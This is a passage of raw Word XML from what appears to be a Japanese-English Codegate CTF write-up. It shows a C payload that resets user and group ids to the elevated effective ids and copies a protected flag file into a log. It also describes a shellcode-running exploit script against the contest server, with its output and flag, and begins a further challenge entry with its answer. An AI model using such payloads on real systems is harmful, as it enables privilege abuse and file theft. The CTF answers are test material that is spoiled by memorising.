      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>setreuid</w:t>
      </w:r>
      <w:r w:rsidRPr="004A5FAD">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>を行わなくても良いことに気づいていなかった</w:t>
      </w:r>
      <w:r w:rsidRPr="004A5FAD">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRDefault="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC1B76" w:rsidRDefault="00AA5FD6" w:rsidP="00AF29A5">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2092" type="#_x0000_t202" style="width:399.85pt;height:394.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2092" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>
                <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00AF29A5">
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>hugh@codegate-desktop:/tmp/0071234$ cat sh.c</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00AF29A5">
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>#include &lt;stdio.h&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00AF29A5">
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>#include &lt;unistd.h&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00AF29A5">
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>#include &lt;sys/types.h&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00AF29A5">
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>int main()</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00AF29A5">
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>{</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FILE *fp, *fp2;</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char buf[256] = {0};</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pP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setreuid(geteuid(), geteuid());</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setregid(getegid(), getegid());</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pP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fp = fopen("/tmp/0071234/log", "wt");</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fp2 = fopen("/home/harder/flag.txt", "rt");</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if(fp2 != NULL)</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fread(buf, 1, 36, fp2);</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fclose(fp2);</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if(fp != NULL)</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fprintf(fp,</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"euid:%d egid:%d\n"</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 uid:%d  gid:%d\n"</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"flag:[%s]\n"</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 geteuid()</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 getegid()</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 getuid()</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 getgid()</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 buf</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fclose(fp);</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w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
                  <w:r w:rsidRPr="00AF29A5">
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>}</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidR="008A4C86">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRDefault="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF29A5">
        <w:t>複数回アタックしてshellcodeを実行しフラグを得るpythonスクリプト</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>prob05.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>"(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>巻末に添付</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRDefault="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRDefault="00AA5FD6" w:rsidP="00AF29A5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2091" type="#_x0000_t202" style="width:399.85pt;height:192.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2091" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>
                <w:p w:rsidR="00AF29A5" w:rsidRPr="00C00B86" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>hugh@codegate-desktop:/tmp/0071234$ gcc sh.c -o sh</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00AF29A5" w:rsidRPr="00C00B86" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>hugh@codegate-desktop:/tmp/0071234$ touch log &amp;&amp; chmod 777 log</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00AF29A5" w:rsidRPr="00C00B86" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>hugh@codegate-desktop:/tmp/0071234$ python prob05.py</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00AF29A5" w:rsidRPr="00C00B86" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>connect to ctf4.codegate.org:9001</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00AF29A5" w:rsidRPr="00C00B86" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>Input:</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00AF29A5" w:rsidRPr="00C00B86" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00AF29A5" w:rsidRPr="00C00B86" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>connect to ctf4.codegate.org:9001</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00AF29A5" w:rsidRPr="00C00B86" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>Input:</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00AF29A5" w:rsidRPr="00C00B86" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00AF29A5" w:rsidRPr="00C00B86" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>connect to ctf4.codegate.org:9001</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00AF29A5" w:rsidRPr="00C00B86" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>Input:</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00AF29A5" w:rsidRPr="00C00B86" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>euid:1004 egid:1004</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00AF29A5" w:rsidRPr="00C00B86" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> uid:1004  gid:1004</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00AF29A5" w:rsidRPr="00C00B86" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>flag:[e2e4cb6adc9cd761dcde774f84529591  -</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00AF29A5" w:rsidRPr="00C00B86" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>]</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009934CF" w:rsidRDefault="009934CF" w:rsidP="009934CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009934CF" w:rsidRDefault="009934CF" w:rsidP="009934CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRDefault="00AA5FD6" w:rsidP="00AF29A5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1078" style="width:6in;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C410E1" w:rsidRDefault="008A4C86" w:rsidP="00591E9D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc257340756"/>
      <w:r w:rsidRPr="00280EE9">
        <w:rPr>
          <w:rStyle w:val="challenge0"/>
        </w:rPr>
        <w:t>Challnge6</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00591E9D">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Points:600   Cl</w:t>
      </w:r>
      <w:r w:rsidR="00591E9D">
        <w:t>eared</w:t>
      </w:r>
      <w:r w:rsidR="00591E9D">
        <w:br/>
      </w:r>
      <w:r>
        <w:t>Answer:iologmsg</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2089" type="#_x0000_t202" style="width:437.4pt;height:106.85pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2089" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C410E1" w:rsidRDefault="008A4C86" w:rsidP="004C534A">
                  <w:r w:rsidRPr="00C410E1">
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                    </w:rPr>
                    <w:t xml:space="preserve">credentials: </w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C410E1" w:rsidRDefault="008A4C86" w:rsidP="004C534A">
                  <w:r w:rsidRPr="00C410E1">
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                    </w:rPr>
                    <w:t>http://ctf.codegate.org/thisiswhereiuploadmyfiles/CC2A8B4FA2E1FA6BD7FE9B8EFC86BCB7</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C410E1" w:rsidRDefault="008A4C86" w:rsidP="004C534A"/>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C410E1" w:rsidRDefault="008A4C86" w:rsidP="004C534A">
                  <w:r w:rsidRPr="00C410E1">
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                    </w:rPr>
                    <w:t>Substitute for those who are not in Korea : http://www.mediafire.com/?wyhexdmzzdm</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C410E1" w:rsidRDefault="008A4C86" w:rsidP="004C534A"/>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00AF29A5" w:rsidRDefault="008A4C86" w:rsidP="00C410E1">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C410E1">
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                    </w:rPr>
                    <w:t>You should convert the flag into lower case letters and try to auth with it.</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00C410E1" w:rsidRPr="008C79FD">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C410E1" w:rsidRDefault="00C410E1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>We fetched file. This file is tar archive. We extract it, we get 2 files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C410E1" w:rsidRDefault="00C410E1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C410E1" w:rsidRPr="00C410E1" w:rsidRDefault="00C410E1" w:rsidP="00C410E1">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C410E1">
        <w:rPr>
